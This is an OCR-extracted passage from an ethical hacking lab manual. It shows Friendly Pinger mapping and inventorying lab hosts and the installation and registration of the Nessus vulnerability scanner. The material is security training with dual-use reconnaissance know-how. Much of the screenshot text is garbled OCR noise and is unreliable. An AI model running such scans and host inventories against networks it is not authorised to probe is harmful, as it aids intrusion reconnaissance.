7. Select File from the menu bar and select die Wizard option L-!»j x ‫׳‬ Module 03 - Scanning Networks r FriendlyPinger [Demo.map] F ile | Edit View P in g N o tific a tio n Scan F /fa tc l‫»׳‬er In ve n to ry H elp ft x!‫צ‬%‫־‬*C*‫י‬ 5 T In la n d fr! S c iy c i Internet Hail Shoitcul ServerHob --------- Mnriem □ WeA Gtfr Open... CtrUN Ctil+O Reopen | Uadate U S a v e . S«v« At... Clow t b Close A ll ► Ctr!‫־‬»U CtrUS fc V Save A s Im age... ^ Print... g‫מ‬ m‫ד‬‫ק‬ ^ Lock... ^ Create Setup... Ctrl'-B 0 Options... F9 X L Frit Alt*■)( WinkStatiun I1,11| J J Workstation a r'r;m O dll initial llldLCicdt FIGURE 9.4: FPinger Starting Wizard 8. To create initial mapping of the network, type a range of IP addresses in specified field as shown in the following figure click Next -----Wizard 10.0.0.7Local IP address: The initial map will be created by query from DNS-server the information about following IP-addresses: 10.0.0.1 •2d You can specify an exacter range of scanning to speed up this operation. For example: 10.129-135.1 •5.1 •10 1000| ITimeout Timeout allows to increase searching, but you can miss some addresses. X Cancel=►Mext4 * gack? Help FIGURE 9.5: FPinger Intializing IP address range 9. Then the wizard will start scanning of IP addresses 111 die network, and list them. 10. Click Next ‫ם‬ Scanning allows you to know a lot about your network. Thanks to the unique technologies, you may quickly find all the HTTP, FTP, e-mail and other services present on your network C] Map occupies the most part of the window. Right- clickit. In the appeared contest menu select "Add” and then ‫״‬Workstation". A Device configuration dialog windowwill appear. Specify the requested parameters: device name, address, description, picture The device is displayed as an animated picture, if it is pinged, and as a black and white picture if it is not pinged Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 162
Module 03 - Scanning Networks Wizard NameIP address W1N-MSSELCK4K41 Windows8 W1N-LXQN3WR3R9M W1N-D39MR5HL9E4 0 10.0.0.2 0 10.0.0.3 0 10.0.0.5 □ 10.0.0.7 The inquiry is completed. 4 devices found. Remove tick fromdevices, which you dont want to add on the map X Cancel3 ‫־‬►Next4 * Back? Help FPinger 9.6: FPmger Scanning of Address completed 11. Set the default options in the Wizard selection windows and click Next Wizard WorkstationQevices type: Address O Use IP-address | ® Use DNS-name | Name ‫ח‬ Remove DNS suffix Add*ion OAdd devices to the new map (•> Add devices to the current map X Cancel!► Next7 Help £L) Press CTRL+I to get more information about the created map. You will see you name as the map author in the appeared dialogwindow £0 Ping verifies a connection to a remote host by sending an ICMP (Internet Control Message Protocol) ECHO packet to the host and listening for an ECHO REPLY packet. A message is always sent to an IP address. If you do not specify an address but a hostname, this hostname is resolved to an IP address usingyour default DNS server. In this case you're vulnerable to a possible invalid entry on your DNS (Domain Name Server) server. FIGURE 9.7: FPinger selecting the Devices type 12. Then the client area will displays the Network map in the FPinger window C E H Lab M anual Page 163 Ethical H acking and Counterm easures Copyright © by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited
Module 03 - Scanning Networks _ □1 x ‫י‬V Friendly Pinger [Default.map] F ile Edit View/ P in g N o tificaT io n S can F W a tch e r in v e n to ry H e lp H ‫>׳״‬ £ ft J* & g FIGURE 9.8 FPmger Client area with Network architecture 13. To scan the selected computer in the network, select die computer and select the Scan tab from the menu bar and click Scan Friendly Pinger [Default.map] Scan FWrtchp Inventory Help F61 50* mM Scan.. file Edit View Ping Notification Lb‫ם‬ - y a * e? ^ 00:00:47233:1 3 / i/ 4clickthe clicnt areato add snew devicc.. FIGURE 9.9: FPinger Scanning tlie computers in the Network 14. It displays scanned details in the Scanning wizard ‫ם‬ If you want to ping inside the network, behind the firewall, there will be no problems If you want to ping other networks behind the firewall, it must be configured to let the ICMP packets pass through. Your network administrator should do it for you. Same with the proxy server. ^ You may download the latest release: http:/ /www.kilievich.com/ fpinger. Q Select ‫״‬File|Options, and configure Friendly Pinger to your taste. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 164
Module 03 - Scanning Networks Scanning Command faCompute W1N-MSSELCK... http://W IN-MSSELCX4M1 W1N-D39MR5H... http://WIN-D39MR5HL9E4 Scanning com plete ^‫׳‬JBescan Service & ] HTTP £ ] HTTP Progress y o k X Caned? Help £□ Double-click tlie device to open it in Explorer. FIGURE 9.10: FPinger Scanned results 15. Click the Inventory tab from menu bar to view die configuration details of the selected computer T ^ r r ‫־‬Friendly P h g er fDefault.maplV P k Edit V 1« w P in g N o tific a tio n S<*n F W a tch cr I rv c n to ry N d p ___________________ 1‫ג‬ Ca:*BSJ &^ ‫׳‬ * m E l InventoryOption!.‫״‬ Ctil-F# FIGURE 9.11: FPinger Inventory tab 16. The General tab of the Inventory wizard shows die computer name and installed operating system £□ Audit software and hardware components installed on tlie computers over the network Tracking user access and files opened on your computer via the network Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 165
Module 03 - Scanning Networks InventoryW File Edit View Report Options Help 0 ‫־‬S ? 1 1 ■ Ela e: | g General[ Misc| M 'j Hardware] Software{ _v) History| ^ K > Computer/User Hos* name |WIN-D39MR5HL9E4 User name !Administrator Windows Name |Windows Server 2012 Release Candriate Datacenter Service pack Cotecton tme Colecbon time 18/22/201211:22:34 AM WIN-D39MR5HL9E4 FIGURE 9.12: FPinger Inventory wizard General tab 17. The Misc tab shows the Network IP addresses. MAC addresses. File System, and Size of the disks x 'Inventory File Edit View Report Options Help e i g? 0 ₪ *a a © G*? fieneraj Misc hardware | Software | History| Network IP addresses MAC addresses 110.0.0.7 D4-BE-D9-C3-CE-2D Jotal space Free space 465.42 Gb 382.12 Gb Display $ettng$ display settings [1366x768,60 Hz, True Color (32 bit) Disk Type Free, Gb Size, Gb £ File System A 3 C Fixed 15.73 97.31 84 NTFS S D Fixed 96.10 97.66 2 NTFS — - — ■ — FIGURE 9.13: FPinger Inventory wizard Misc tab 18. The Hardware tab shows the hardware component details of your networked computers CQ Assignment of external commands (like telnet, tracert, net.exe) to devices 5 Search of HTTP, FTP, e-mail and other network services Function "Create Setup" allows to create a lite freeware version with your maps and settings Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 166
Module 03 - Scanning Networks T T File Edit View Report O ptions Help 0 ^ 1 3 1 0 H w 1N-D39MFS5HL9E4|| General Miscl Mi H a rd w a re [^ ] Software History | < > 1 4x Intel Pentium III Xeon 3093 B Memory <24096 Mb - Q j BIOS Q| AT/AT COMPATIBLE DELL • 6222004 02/09/12 - £ ) ‫י‬ Monitors Genetic PnP Monitor - ■ V Displays adapters B j) lnte<R) HD Graphics Family E O Disk drives q ST3500413AS (Serial: W2A91RH6) - ^ Network adapters | j | @netrt630x64.inf,%rtl8168e.devicedesc%^ealtekPQeGBE Family Controller - ^ SCSI and RAID controllers @spaceport.inf,%spaceport_devicedesc%;Micro$oft Storage Spaces Controller I J FIGURE 9.14: FPinger Inventorywizard Hardware tab 19. The Software tab shows die installed software on die computers ------------------ HInventory File Edit View Report Options Help 1 0€ 1 3‫י‬0[£) Q5r G§* general | M‫׳‬sc H«fdware| S Software History | QBr < > Adobe Reader X (10.1.3) eMaiTrackerPro EPSON USB Display Friendfy Priger IntelfR) Processor Graphics Java(TM) 6 Update 17 Microsoft .NET Framework 4 Multi-Targeting Pack Microsoft Appfcation Error Reporting Microsoft Office Excel MUI (English) 2010 Microsoft Office OneNote MUI (English) 2010 Microsoft Office Outlook MUI (English) 2010 Microsoft Office PowerPoint MUI (English) 2010 Microsoft Office Proof (English) 2010 Microsoft Office Proof (French) 2010 Microsoft Office Proof (Spanish) 2010 Off*** Prnnfirxi (Pnnli^hl ? fllfl A V TetaS Name Version Developer Homepage | f t Go WIN-D39MR5HL9E4 FIGURE 9.15: FPinger Inventory w!2ard Software tab Lab Analysis Document all die IP addresses, open and closed ports, services, and protocols you discovered during die lab. Q Visualization of your computer network as a beautiful animated screen Ethical H acking and Counterm easures Copyright O by EC‫־‬Coundl All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 167
Module 03 - Scanning Networks T ool/U tility Inform ation Collected/O bjectives Achieved IP address: 10.0.0.1 -10.0.0.20 Found IP address: ■ 10.0.0.2 ■ 10.0.0.3 ■ 10.0.0.5 ■ 10.0.0.7 Details Result of 10.0.0.7: FriendlyPinger ■ Computer name ■ Operating system ■ IP Address ■ MAC address ■ File system ■ Size of disk ■ Hardware information ■ Software information Y O U R I N S T R U C T O R I F Y O U H A V E Q U E S T I O N S R E L A T E D T O T H I S L A B . Questions 1. Does FPinger support proxy servers firewalls? 2. Examine the programming of language used in FPinger. Internet Connection Required □ Yes 0 No Platform Supported 0 Classroom 0 iLabs Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 168
Module 03 - Scanning Networks Lab Scanning a Network Using the NessusTool Nessusallowsyou to remotelyaudita netirork anddetermineif it has been broken into ormisusedin somen‫׳‬ay. It alsoprovides the ability to locallyaudita specific machinefor vulnerabilities. Lab Scenario 111 the previous lab, you learned to use Friendly Pinger to monitor network devices, receive server notification, ping information, track user access via the network, view grapliical traceroutes, etc. Once attackers have the information related to network devices, they can use it as an entry point to a network for a comprehensive attack and perform many types of attacks ranging from DoS attacks to unauthorized administrative access. If attackers are able to get traceroute information, they might use a methodology such as firewalking to determine the services that are allowed through a firewall. If an attacker gains physical access to a switch 01 other network device, he or she will be able to successfiUly install a rogue network device; therefore, as an administrator, you should disable unused ports in the configuration of the device. Also, it is very important that you use some methodologies to detect such rogue devices 011 the network. As an expert ethical hacker and penetration tester, you must understand how vulnerabilities, compliance specifications, and content policy violations are scanned using the Nessus rool. Lab O bjectives This lab will give you experience 011 scanning the network for vulnerabilities, and show you how to use Nessus. It will teach you how to: ■ Use the Nessus tool ■ Scan the network for vulnerabilities I CON KEY ‫־‬7=7 Valuable mformation s Test your knowledge Web exercise m W orkbook review* Ethical H acking and Counterm easures Copyright © by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited. C E H Lab M anual Page 169
Module 03 - Scanning Networks Lab Environm ent To cany out die lab, you need: ■ Nessus, located at D:CEH-ToolsCEHv8 Module 03 Scanning NetworksWulnerability Scanning ToolsNessus ■ You can also download the latest version of Nessus from the link http: / / vwv.tenable.com / products/nessus/nessus-download- agreement ■ If you decide to download the latest version, then screenshots shown in the lab might differ ■ A computer running Windows Server 2012 ■ A web browser with Internet access ■ Administrative privileges to run the Nessus tool Lab Duration Time: 20 Minutes O verview of Nessus Tool Nessus helps students to learn, understand, and determine vulnerabilities and weaknesses of a system and network 111 order to know how a system can be exploited. Network vulnerabilities can be network topology and OS vulnerabilities, open ports and running services, application and service configuration errors, and application and service vulnerabilities. Lab Tasks 1. To install Nessus navigate to D:CEH-ToolsCEHv8 Module 03 Scanning NetworksWulnerability Scanning ToolsNessus 2. Double-click the Nessus-5.0.1-x86_64.msi file. 3. The Open File - Security Warning window appears; click Run ‫ך‬5‫־ד‬Open File Security Warning D o y o u w a n t t o ru n th is fie ? fJa n e ‫־‬ /lk g rtA d m in irtrat0 rD etH 0 D 'v N ecs1 K -5 0 2 -6 £ &‫ר‬C.rrK P u d s h t ‫׳‬: Ic n a M c N e tw o r k S e c u rity Int. T y p e W in dow s Installer Package From; C ;lbcm Adm ini3t‫׳‬ato1DoklopNe11u1-5.02-*66 $4-. CencHRun V Alw ays esk cefcre opening th e file W h Jr fi: « fro m t h e Int& net can b e useful, th is file ty p e can potentially harm >our c o m p u ter O nly run softw are from p u b ltih en y e n tru st ^ W hat s the nsk? £ ‫ז‬ Tools demonstrated in this lab are available in D:CEH- ToolsCEHv8 Module 03 Scanning Networks m Nessus is public Domain software related under the GPL. 8 T A s K 1 Nessus Installation "^7 Nessus is designed to automate the testing and discovery of known security problems. FIGURE 10.1: Open File ‫־‬ SecurityWarning Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 170
Module 03 - Scanning Networks 4. The Nessus - InstallShield Wizard appears. Dining the installation process, the wizard prompts you for some basic information. Follow die instructions. Click Next. Tenable Nessus (x64) ‫־‬ InstallShield Wizard$ Welcome to the InstallShield Wizard for Tenable Nessus (x64) The InstalSh1eld(R) W izard wdl n s ta l Tenable Nessus (x64) on your computer. To continue, d d c Next. WARNING: T h s program is protected by copyright law and nternational treaties. < Back N ext > Cancel FIGURE 10.2: The Nessus installation window 5. Before you begin installation, you must agree to the license agreement as shown in the following figure. 6. Select the radio button to accept the license agreement and click Next. Tenable Nessus (x64) - InstallShield Wizard!‫;ל‬ L ic e n se A g r e e m e n t Please read the following k e n se agreement carefully. 0 Tenable Network Security, Inc. NESSUS® software license Agreement This is a legal agreement ("Agreement") between Tenable Network Security, Inc., a Delaware corporation having offices at 7063 Columbia Gateway Drive. Suite 100, Columbia, MD 21046 (“Tenable"), and you, the party licensing Software (“You‫.)״‬ This Agreement covers Your permitted use of the Software BY CLICKING BELOW YOU !unir.ATF v m iB Ar.r.FPTAMr.F np tw/.qArtPFPMFUT auh Printaccept the terms in the k e n s e agreement O I do not accept the terms n the k e n se agreement InstalShiekJ-------------------------------------------------------------- CancelNext >< Back FIGURE 10.3:Hie NessusInstall ShieldWizard 7. Select a destination folder and click Next. m The updated Nessus security checks database is can be retrieved with commands nessus-updated- plugins. Q Nessushasthe abilityto test SSLizedservices suchas http, smtps, imapsandmore. Nessus securityscanner includesNASL (Nessus Attack ScriptingLanguage). Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 171
Module 03 - Scanning Networks Tenable Nessus (x64) - InstallShield Wizard D e stin a tio n Fold e r Click Next to instal to this folder, or ckk Change to instal to a different folder. Change... Instal Tenable Nessus (x64) to: C:Program FtesTenableNessus£> InstalShield CancelNext >< Back FIGURE 10.4:Tlie NessusInstall ShieldWizard 8. The wizard prompts for Setup Type. With die Complete option, all program features will be installed. Check Complete and click Next. Tenable Nessus (x64) ‫־‬ InstallShield Wizard S e t u p T y p e Choose the setup type that best smts your needs. FIGURE 10.5: The Nessus Install Shield Wizard for Setup Type 9. Tlie Nessus wizard will prompt you to confirm the installation. Click Install Ibdl Nessus givesyouthe choice forperformingregular nondestructive security audit on aroutinelybasis. Q Nessusprobes arange ofaddresseson a networkto determinewhichhosts are alive. Ethical H acking and Counterm easures Copyright O by EC-Council All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 172
Module 03 - Scanning Networks Tenable Nessus (x64) - InstallShield Wizard R e a d y to In st a ll th e P ro g ra m The wizard is ready to b egn n stalation . Click Instal to begn the nstalatoon. If you want to review or change any of your installation settings, dfck Back. Ckk Cancel to exit the wizard. InstalShield CancelInstal< Back Nessusprobes network serviceson eachhostto obtain banners that contain softwareand OSversion informatioa FIGURE 10.6: Nessus InstallShield Wizard 10. Once installation is complete, click Finish. Tenable Nessus (x64) ‫־‬ InstallShield Wizard InstalShield Wizard Completed The InstalShield Wizard has successfuly nstaled Tenable Nessus (x64). Ckk Finish to exit the wizard. Cancel Q Path ofNessus home directoryforwindows programfilestanablenessus FIGURE 10.7: Nessus Install Shield wizard Nessus Major Directories ■ The major directories of Nessus are shown in the following table. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 173
Module 03 - Scanning Networks Nessus Home D irectory Nessus S ub-D irectories Purpose 1W indows Program FilesTenableNessus conf Configuration files data Stylesheet templates nessusplugins Nessus plugins nassusus«rs<username>lcbs User knowledgebase saved on disk >----------------------- - n o 3 3 u s l o g s 1 --------------------------1 , Nessus log flies TABLE 10.1: Nessus Major Directories 11. After installation Nessus opens in your default browser. 12. The Welcome to Nessus screen appears, click die here link to connect via SSL w e lc o m e to Nessus! PIm m c o n n e c t v ia S S L b y click in cJ h » r « . Y o u a r e hkely to g e t a se cu rity alert from you r w e b b r o w ser sa y in g th a t th e SSL c er tific a te is in valid . Y ou m ay e ith er c h o o s e t o tem p o ra rily a c c e p t t h e risk, or c a n o b ta in a valid SSL c er tific a te from a registrar. P le a se refer t o th e N e ss u s d o c u m e n ta tio n for m o re in form ation . FIGURE 10.8: Nessus SSLcertification 13. Click OK in the Security Alert pop-up, if it appears Security Alert Jj You are about toviewpages over a secure connection. Any informationyou exchange withthis site cannot be viewed by anyone else onthe web. ^Inthefuture, do not showthis warning ‫ע‬ More InfoOK FIGURE 10.9: Internet Explorer Security Alert 14. Click the Continue to this w ebsite (not recommended) link to continue feUI Duringthe installation and dailyoperationof Nessus, manipulatingthe Nessus serviceisgenerallynot required — T h e Nessus Server Manager used in Nessus 4 has been deprecated Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 174
Module 03 - Scanning Networks 1&* ^ II Ccrtficate Error: Mavigation... ' X Snagit g j £t There is a problem with this website's security certificate. Thesecurity certificate presented by this website was not issued by a trusted certificate authority. Thesecurity certificate presented by this websrte was issued for a different website's address. Sccunty certificate problems may indicate an attempt to fool you or intercept any data you send to the server. Wc recommend that you close this webpage and do not continue to this website. d Click here to close this webpage. 0 Continue to this website (not recommended). More information FIGURE 10.10: Internet Explorer website’s security certificate 15. on OK in the Security Alert pop-up, if it appears. Security Alert 1C. i) ^ou are a^outt0 viewpages over a secure connection Any informationyou exchange withthis site cannot be viewed by anyone else onthe web. HI Inthefuture, do not showthis warning 1 More InfoOK FIGURE 10.11: Internet Explorer SecurityAlert 16. Tlie Thank you for installing Nessus screen appears. Click the Get Started > button. R ff £Q! Due to dietechnical implementation ofSSL certificates,itisnot possible to ship a certificatewith Nessus thatwould be trusted to browsers •>>< h * i 1i Nwmu* dllimi v»u to pwloiin W e lc o m e t o N e s s u s ‫׳‬ T W 1k you loi I11«ldlll1•j tin• wuM 1 1I *ah 3pe«d vulnerability discovery, to <Je?e‫־׳‬r re *Ivcn hcets are njmlna nhich se1v1r.es 1AijnnlUiai Auditing, la 1m U wt« no Im l )■ » ia aacurlty |W ■I■>!! >L-umplianca chocks, to verify and prove that eve‫־‬, host on your network adheres to tho security potcy you 1 ‫י‬ Scan scliHliJing, to automatically iu i *cant at the you ‫׳‬ And morel !!•< stofted > FIGURE 10.11: Nessus Getting Started 17. 111 Initial Account Setup enter the credentials given at the time of registration and click Next > m warning, a custom certificateto your organizationmustbe used Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 175
Module 03 - Scanning Networks Wefconeu Neausp • o («*•*<‫>״.»*״‬. e c In itia l Account Setup First, we need to create an admin user for the scanner. This user will have administrative control on the scanner; the admin has the abilityto create/deiete users, stop ongoing scans, and change the scanner configuration. loo*n: admin Confirm P.ivwvoiri. < Prev | Next > | Because fAeadmin user can change the scanner configuration, the admin has (he ability to execute commands on the remote host. Therefore, It should be i that theadmin user has the same privilegesas the *root‫״‬ (or administrator) user on the remote ho■ FIGURE 10.12: Nessus Initial Account Setup 18. 111Plugin Feed Registration, you need to enter die activation code. To obtain activation code, click the http://www.nessus.org/register/ link. 19. Click the Using Nessus at Home icon in Obtain an Activation Code mi(A*CAftCMin‫ז‬ <9>TENABLE Network Security* I n CertiriMtion Resources Support Obtain an Activation Code Using Nesaus al Work? Using Nessus at Home? A l’1nW*a4» . ^ - ‫״‬ A Ham■(■ml lUbtCltpMl Is wUk1uV4cM* fu< all DM 4r«l tec h tm Mia ootj in IriM hlr Product*. PiotfuUOi'eniB* Nksui AudHai .1ndi■ N w m Plug** .Sjirplr Repom N«MUiFAQ Vk«le Ostlrtt FAQ Dtptovmam1>:001u Mewos Evukoiion Training > ■ el m Ifyouareusingtlie Tenable SecurityCenter, the ActivationCode andplugin updates aremanagedfrom SecurityCenter. Nessus needs to be startedto be ableto communicatewith SecurityCenter,whichitwill normallynot dowithout a validActivation Code and plugins FIGURE 10.13: Nessus Obtaining Activation Code 20. 111 Nessus for Home accept the agreement by clicking the Agree button as shown in the following figure. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 176
Module 03 - Scanning Networks ■ U s u ilv U tn ir n N tWokerne10NaMiecem • -•‫־■״‬■‫••־‬‫׳‬•‫י‬ . nr.• ■ Bw* ms i 1*vtl ProtoiaioaaJFetid mbbithiiiienjoy You M ! •otu u 1 . The Netare rtoaaafecd do*1*c* gn* youio :w to of 1K0v>yovtoperform < dedR 0( *S* Tw Nes*u»llrtual apCliMK* 1Nmhh HomFnd Mibscilpllon it a■elable lot ptnoia) mm ‫•י‬ a I ( oaty. tt is net lot use by anycommercial oigani/atna t !on 1q«t! c*«»*| or vw * In m * iiw M n i tr.iimvj TrawtoaProgram ft* n•**) 0<>1ri;■itlonf. To »w •^ •# ! 1k* M m ii HowFbwJ »«tncri|40nlot lo »1 «m |fc w cfe* ‘^7‫•׳‬ • ’ to k u « i *to Himi «1«m and bagln thedownlMd prooaat• SU8VCWII0M ACM I Ml NI Product Overview Features N055ue b> Buwwct Naasuster Horn* W*y Up*«rit>to New#* *7 Nesius MoMe A!(n N w m PlufllM • ‫־‬‫״‬‫׳‬ » SuypmW n m •‫■יי‬Ini 01Ope‫״‬nlr*j SyvtMn otw f%9 afA Q 0t Naasaai fA£ lound onarry lenaUc «v*&01 *tov>on1e)1nok1a»«to to• 1Mveelfe ncto4 n! nn u n M o iy K»• • R •**«»•wna#-»*<1 S«4xc>|pl«n You agio• 10r«v *to*•‫״‬ «<«* to•10 T<«atd» to•each•yatoan onwhich You havo inetrJted aPrjntr'Kl Scam*• T‫»׳‬ « r^ (Vg n v tiloni K.:»*iht1i«1iirg 1N» pit^ifcrtcn 0• com w cid v••m S*c»m 2141.1Vauar« a *akiarxj otsnrkalon. You may copy MM !•*get •MMMaM T tN tV t NM«U»Md Tm1U» HonMF«*d S<Mot*«M rw gto M toa<trw h •ad to«*♦ e»»»ootn &e«lng onV Upon eompte^oti ot # * d m f*» J a to T i rigMto d a Itia Pkj£n&piotUfed by Via HomaFaadSubscriptionis Sarnia Rapatto N m ai fAQ VWtlu 0#>lM4 I AQ Deployment Options «#F«dS»t‫־‬vjlp‫־‬i:1‫׳‬(«.actable n*coxtone*«rthtoeSuts<‫־‬i* Ayee^aeannr«ftj (of anapay an! <?AcaM«• tee■■associated- r t»•! Subscriptia• You awv not u&etw H>r‫*׳‬ f sad SutricripUo $1antedtoYoulot »[ ‫ג‬»‫י‬»‫י‬ puipoMStoaacuia Y«u>01 anythirdparty’s,itatrvoifcsor toanyefea■ •■**e'ltt dMMoai !raning h ar*xvp10A 1clon «nv»on‫׳‬n*rr Tm Uaany kta au h ito a Sut«rp#on undatthisSoctnn 2{c1311to•! C is t* Massus Ftegm L«.<lopmcnt and I « & ‫״‬ JM 1a<(1 at fta Subscriptions 10mfle and dav£f 1 apmant and Dtsoibullan TenableI I*«raaI FIGURE 10.14: Nessus Subscription Agreement Fill in the Register a HomeFeed section to obtain an activation code and click Register. 21 GO!ENTER SEARCH TEXT * TENABLE N etw ork Security Partner* Iraining ft(Vrttflratton Resources .Support •print | Register a HomeFeed IM#tl4vjfed >11 U nil! not t T0 stay up to dah» with tlwi N11tit>u1>pljgint you must tt‫־‬•; emai M tdrnt to utilch an activation code wll be *ert Ye shared ‫.׳‬vtth any 3rd pany. ‫ס‬ ■‫־‬ •*•* • con^ □ Check lo receive updates from Tenable Inpqi<;tpr I Iriuihlr I'rorfiirtr Pioduct Ovm v Iow Nos»us Auditor OuntSes N«84ua Ptu^lns Documentation Sample Repona N«5sus FAQ Motde Devices FAQ Deployment Options Nes3u3 Evaluation Training FIGURE 10.15: Nessus Registering HomeFeed 22. The Thank You for Registering window appeals for Tenable Nessus HomeFeed. S l f you do not register your copy of Nessus, you will not receive any new plugins and will be unable to start the Nessus server. Note: The Activation Code is not case sensitive. Ethical H acking and Counterm easures Copyright C by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 177
Module 03 - Scanning Networks 217After the initial registration, Nessus will download and compile the plugins obtained from port 443 of plugins.nessus.or gplugins- customers.nessus .org 24. Now enter the activation code received to your email ID and click Next. ‫י‬V j . *>■ «Y«.to‫׳‬. ENTER SEARCH IE ■ ( TENABLE N etw ork S ecurity1 solutions Products Services Partners iraimna & certification Resources Support About tenable Store >print | » sltare Q Tenable C haritable & Training Organization Program Tenable N c tin il S caiH y offers N essus I'rctttw oM f eed 1uMcnp«on• •t no cost to ctiirttabi• orqarization• I Tenable Products Thank You for Registering! nessus Thank jrou tor reghletlag your ‫ז‬eonbit‫׳‬ Ni-viun HomeFeed An emal eonraMng w a actlvafen rode hA» just b««n Mint to you al tie email • M m you ptavWed Please note that »*• Tenable Ne-uut HomeFeed 11 available for hoata u m oolr If you wantto uaa Naasu* at your place of business, you must outcKase the Nessus Proteaaowageed Akemaiet. you nay purchase a subscription to the Nessus Porimolot S arnica and tea* in Mis cioudl Tha N attu i Ponawlci Service does no( require any software download. Foi more artonnafon on tw HomsFeed. Professional eed and Nessus Perimeter Ser.ice. please visit our Discussions Forum. Product Overview Nessus Auditor Bundles Nessus Plugins Documentation Sample Reports Nessus FAQ Mobile Devices FAQ Deployment Options S m u t Evaluation I raining FIGURE 10.16: Nessus Registration Completed 23. Now log in to your email for the activation code provided at the time of registration as shown in the following figure. < d 1X»»S •UfKftCiC X _ uSm9Sma yanooco-n'‫•״‬ rI • •> • » • Sm>Cu1 Oft■•■ > Y A H O O ! MAIL MIMDtlalt •««k «Mr tielalnlfluent ler 1t»e Homefaea Activation Cooe ‫י‬ NMtut K ig iiio i • 10 1■■-•OnHOOOOl* Th■* )0ulw rejnlemj row N n w i k » * x Th*M»«u» H«mef««d gubKtcton •mIIkeep<»1»Netful at»ll>scanting I youusa Hat(us n ‫ג‬ professoral 09301 10u a s*:fess1crulF«c 2ut>cagttc«1 : cu itm*#ou•u new wtepswirascamtriiiHinario‫׳‬o » n»‫׳‬Tns6*one4m C««eusngmt srccediret Strpw. ■cnm tela poem >»»a « m u a 1j ‫•מ׳‬ immipuj-<n» •‫***יי‬*w«,!te.^ffiwr.flgm.'iti'HMiitltinMSua^jaiiifrtiiwft■ Me• in MWmtt'ptsteOir*topMtie U*l anac*»>*‫*׳‬e»a‫״‬»**—t Mtx caaa initaiaiaftBfl Pltat*CCnWtlf*HWtl1t i **ttliaWn &•& NoInlfmel Acoe1»an1w Mm«ui M>t« MeH4J«1n«t|11»1»ncamoi‫׳‬ ‫י*ז«•׳‬f • YoucanAndot>n«1c‫־‬jlst11l»Jt1irutveasnj * FIGURE 10.17: Nessus Registration mail Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 178
Module 03 - Scanning Networks 9Wekcm*10Meuvt®[‫ן‬,-" • ‫״‬ F Plugin Feed Registration As• inform ation about new vulnerabilities 18 discovered and released into th e public dom ain, Tenable's research staff designs program s ("plugins”) th at enable Nessus to detect th eir presence. The plugins contain vulnerability Inform ation, th e algorithm to test fo r th e presence of the security Issue, and a set of rem ediation actions. To use Nessus, you need to subscribe to a "Plugin Feed*. You can do so by v o tin g http . / / www.nessus.orQyreolster/ to obtain an A ctivation Code. • To use Nessus at your workplace, pufdiaae a commetGd Prgfcaatonalfccd • To u m N cM uti a t 10 a non ■commercial hom e environm ent, you can get 11 HoiimFeod for free • Tenable SecurltvC entor usore: Enter 'SoairltyC enter* in the field below • To perform offline plugin updates, en ter 'offline' In th e field below Activation Code Please e n ter your Activation C o d e:|9 0 6 1 -0 2 6 6 -9 0 4 6 -S 6 E 4 -l8 £ 4 | x | O ptional Proxy Settings < Prev N ext > IbsdJ Once the pluginsliave beendownloaded and compiled, theNessus GUI toUinitializeand the Nessus serverwillstart FIGURE 10.18: Nessus Applying Activation Code 25. Tlie Registering window appears as shown in die following screenshot. C * *-h o * P • 0 Cc**uttemH S C J wefc<•*‫<׳‬ to m ft * o f x B s ~ ** ■ d 1 R egistering... Registering the scanner with Tenable... FIGURE 10.19: Nessus Registering Activation Code 26. After successful registration click, Next: Download plugins > to download Nessus plugins. *‫יי‬‫־‬‫-׳‬ P • O Ce*rt<*e««o« & C| WetconetoNessus ■ ‫־‬ ‫־‬ ft * o ‫ן‬[x a R eg istering... Successfully registered th e scanner with Tenable. Successfully created the user. | N ext: Download plugin a > | m Nessus server configurationismanagedvia the GUI The nessusdeonf fileisdeprecated In addition, proxysettings, subscription feedregistration, andoffline updates are managedviathe GUI FIGURE 10.20: Nessus Downloading Plugins 27. Nessus will start fetching the plugins and it will install them, it will take time to install plugins and initialization Nessus is fetching th e new est plugin set Pleaae w ait... FIGURE 10.21: Nessus fetching tlie newest plugin set 28. H ie Nessus Log In page appears. Enter the Username and Password given at the time of registration and click Log In. Ethical H acking and Counterm easures Copyright O by EC‫־‬Counc11 All Rights Reserved. Reproduction is Strictly Prohibited C E H Lab M anual Page 179
